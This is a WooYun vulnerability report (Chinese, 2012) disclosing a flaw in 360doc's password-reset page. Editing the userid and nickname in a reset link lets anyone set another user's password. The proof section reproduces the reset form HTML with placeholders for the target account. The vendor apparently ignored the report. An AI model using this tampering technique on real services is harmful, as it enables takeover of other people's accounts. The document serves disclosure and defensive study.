当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-014168

漏洞标题:360doc修改任意用户密码漏洞

相关厂商:360doc北京六智信息技术有限公司

漏洞作者: ccccshq

提交时间:2012-11-01 16:50

修复时间:2012-12-16 16:50

公开时间:2012-12-16 16:50

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-11-01: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-12-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

朋友给介绍了一个个人图书馆的网站,感觉不错,拿来试试,没想到jb了。任意修改密码,人品大爆发啊。。。

详细说明:

在http://www.360doc.com/index.html登录界面点击忘记密码,输入真实的邮箱。
打开邮箱收到一个360doc的修改密码的链接,打开修改密码的页面,把id和昵称修改成其他用户的,即可成功修改其他用户密码哦,吼吼。。。

漏洞证明:

<form name="aspnetForm" method="post" action="/resetpassword.aspx?userid=输入想要修改用户的id哦:)&amp;code=WW5G3BYQWK9X84XXZZ" id="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUIODc3NDEyNzhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBSFjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJEJ1dHRvbjEMFed1VkSg3VkY/L/AaqKx6e7VFw==">
</div>
    <table cellpadding="0" cellspacing="0">
        <tbody><tr>
            <td style="text-align:right;height:40px;">
                <div class="zhuce_con01">
                    用户名:</div>
            </td>
            <td>
               <div style=" font-weight :bold;padding-left:8px; font-size:14px;">输入想要修改的用户的昵称哦:)
</div>
            </td>
            <td>
            </td>
        </tr>
        <tr>
            <td style="text-align:right;height:40px;">
                <div class="zhuce_con01">
                    密码:</div>
            </td>
            <td>
                <input name="ctl00$ContentPlaceHolder1$txtPwd" type="password" id="ctl00_ContentPlaceHolder1_txtPwd" class="zcbasicinput pwd1" size="25" onblur="checkPassword();" onclick="inputPassword();">
            </td>
            <td>
                <div id="msgPassword">
                </div>
            </td>
        </tr>
        <tr>
            <td style="text-align:right;height:40px;">
                <div class="zhuce_con01">
                    再次输入新密码:</div>
            </td>
            <td>
                <input name="ctl00$ContentPlaceHolder1$txtPwd1" type="password" id="ctl00_ContentPlaceHolder1_txtPwd1" class="zcbasicinput pwd2" size="25" onblur="checkPassword1();">
            </td>
            <td>
                <div id="msgPassword1">
                </div>
            </td>
        </tr>
        <tr>
            <td style="height:50px;">
            </td>
            <td>
                <input id="btnSend" type="button" value="确定" class="botton" onclick="checkAll();">&nbsp;&nbsp;&nbsp;
                <input type="reset" value="取消" class="botton">
                <input type="image" name="ctl00$ContentPlaceHolder1$Button1" id="ctl00_ContentPlaceHolder1_Button1" class="Button1" src="" style="border-width:0px;display: none;">
            </td>
            <td>
            </td>
        </tr>
    </tbody></table>
    </form>



修复方案:

略。。。

版权声明:转载请注明来源 ccccshq@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝